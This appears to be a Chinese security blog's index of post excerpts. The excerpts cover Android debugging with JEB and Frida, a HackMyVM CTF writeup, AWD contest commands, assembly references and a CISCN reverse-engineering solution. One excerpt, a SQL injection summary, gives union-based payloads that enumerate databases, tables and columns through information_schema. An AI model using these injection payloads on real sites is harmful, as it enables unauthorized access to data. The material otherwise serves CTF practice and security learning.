jeb动态调式apk
需要开启:debuggable=”TRUE”或者手机全局是可以debug。
1、获取包名12方式1:aapt dump badging apk的名字方式2:adb shell dumpsys activity top
2、开启APK调试模式1234adb shell am start -D -n 包名/类名;出现Debugger的等待状态#获取前端app的Activity:比如本次获得的包名:com.zhuotong.easyctf2.MainActivityadb shell am start -D -n com.zhuotong.easyctf2/.MainActivity
需先打开雷电模拟器
3、JEB连接模拟器进行调试略
frida
注:frida的客户端与服务端版本对应相同
1、查看手机型号12# 查看手机型号adb shell getprop ro.product.cpu.abi
2、将frida-server放到手机的/data/local/tmp目录下,赋权运行:1234adb push frida-server /data/local/tmpadb rootadb shell chmod +x /data/local/tmp/frida-serveradb shell /data/local/tmp/frida-server -l 0.0.0.0:1234 # -l 0.0.0.0:1234为指定端口,不写默认27042端口
3、开启端口转发:1234567frida-端口转发(27042 /27043)修改默认端口,指定端口:frida -l 0.0.0.0:1234adb forward tcp:1234 tcp:1234默认:adb forward tcp:27043 tcp:27043adb forward tcp:27042 tcp:27042
客户端:fr ...
Venus–HMVLabs–HackMyVM–Writeup
1、hacker
2、sophia
3、angela
4、emma
当使用 cat - 时,通常是用来从标准输入读取内容并将其输出到标准输出
在脚本中,可以使用 cat - 处理来自标准输入的内容,如:
12345#!/bin/bashecho "Please enter your name:"read nameecho "Hello, $name!"cat -
这个脚本会先要求用户输入名字,然后通过 cat - 等待用户进一步输入,并将其内容直接输出。
所以这里直接使用
1cat ./-
5、mia
这里使用
1find / -name hereiam -type d 2>/dev/null
-type d: 限制搜索结果只包括文件夹。-type f为限制搜索结果只包括文件
2>/dev/null: 将标准错误(stderr)重定向到 /dev/null,这样可以隐藏搜索过程中可能出现的错误信息。这可以防止由于权限不足或其他原因导致的错误消息在终端上显示出来。
6、camila
这个muack文件夹里面有好多子目 ...
sql注入的一些汇总
做一个关于sql注入的一些汇总,我个人偏向手注,做此汇总,持续更新。
首先是sql注入的原理必须要知道,不同的sql注入其实都是为了达到欺骗服务器sql查询语句的作用。关键在于思路和方法,了解服务器后端执行流程也是相当重要的,只不过在黑盒测试中很难去知道其具体的执行流程,这就需要经验以耐心了,千万不能急。
盲注布尔盲注首先是判断字段数
比如
121' order by 2 # //正常回显1' order by 3 # //报错,说明字段数为2
然后去爆数据库
11’ union select 1,database() #
爆表
11‘ union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 #
爆字段名
11‘ union select 1,column_name from information_schema.columns where table_schema=database() and table_name=& ...
awd攻防思路及一些脚本
一些常用的命令学习命令的使用。
12345678910111213141516171819202122232425tar -zcvf web.tar.gz /var/www/html/ 将/var/www/html压缩一份到web.tar.gztar -xzvf web.tar.gz 解压web.tar.gzmysql -uroot -proot #进入数据库,用户名和密码都是root备份服务器上所有数据库mysqldump –-all-databases > 123.sql备份指定数据库:mysqldump –u username –p password databasename > bak.sqlmysql备份单个数据库命令mysqldump --column-statistics=0 -h主机ip -P端口号 -u数据库用户名 -p数据库密码 数据库名称 > 想要备份的文件名称.sqlnetstat -tuln 查看当前系统上开放的端口和相应的服务netstat -ano/-a #查看端口情况lsof -i:端口号 或者 netst ...
leave;ret
挖坑,待填
挖坑,待填
挖坑,待填
挖坑,待填
挖坑,待填
挖坑,待填
挖坑,待填
(看雪学院)汇编速查手册
参考资料:看雪学苑-看雪-安全培训|安全招聘|www.kanxue.com
8088 汇编速查手册一、数据传输指令─────────────────────────────────────── 它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据. \1. 通用数据传送指令. MOV 传送字或字节. MOVSX 先符号扩展,再传送. MOVZX 先零扩展,再传送. PUSH 把字压入堆栈. POP 把字弹出堆栈. PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈. POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈. PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈. POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈. BSWAP 交换32位寄存器里字节的顺序 XCHG 交换字或字节.( 至少有一个操作数为寄存器,段寄存器不可作为操作数) CMPXCHG 比较并交换操作数.( ...
各个寄存器作用详解
参考资料:【汇编】各个寄存器作用详解_info registers 每个寄存器的意义-CSDN博客
寄存器定义
寄存器是 中央处理器内的组成部份。 寄存器是有限存贮容量的高速存贮部件,它们可用来暂存指令、 数据和位址。在中央处理器的控制部件中,包含的寄存器有 指令寄存器(IR)和 程序计数器(PC)。 在中央处理器的算术及逻辑部件中,包含的寄存器有 累加器( ACC )。 寄存器是内存阶层中的最顶端, 也是系统获得操作资料的最快速途径。 寄存器通常都是以他们可以保存的位元数量来估量,举例来说,一个 “8 位元寄存器”或 “32 位元寄存器”。寄存器现在都以寄存器档案的方式来实作, 但是他们也可能使用单独的正反器、高速的核心内存、 薄膜内存以及在数种机器上的其他方式来实作出来。 寄存器通常都用来意指由一个指令之输出或输入可以直接索引到的暂 存器群组。更适当的是称他们为 “架构寄存器”。 例如,x86 指令及定义八个 32 位元寄存器的集合,但一个实作 x86 指令集的 CPU 可以包含比八个更多的寄存器。 寄存器是CPU内部的元件,寄存器拥有非常高的读写速度, 所以在寄存器之 ...
2024ciscn_RE_wp
asm_reArm汇编审计
当时虽然汇编指令没看懂,但是操作大概是能顺下来的。
找到加密过程和密文就行。
加密过程在loc_100003D00处
大概就是说(((W8*0x50)+20)^0x4D)+30这样一个加密过程。
然后根据W8找到密文的位置。
这里因为是用双字节去存储的,所以要提取双字节数字,注意小端序。
EXP:
12345x=[8151, 8631, 7751, 8231, 9959, 4311, 4391, 8199, 4551, 7751, 4119, 4119, 4599, 8199, 4151, 4359, 7959, 4311, 4119, 4119, 8039, 4119, 4551, 4551, 4119, 8151, 7959, 4359, 3911, 4391, 4151, 7751, 4151, 8151, 4359, 8151, 4359, 10119]for i in range(len(x)): y=(((x[i]-30)^0x4D)-20)/0x50 print(chr(int(y)),end="")
gd ...
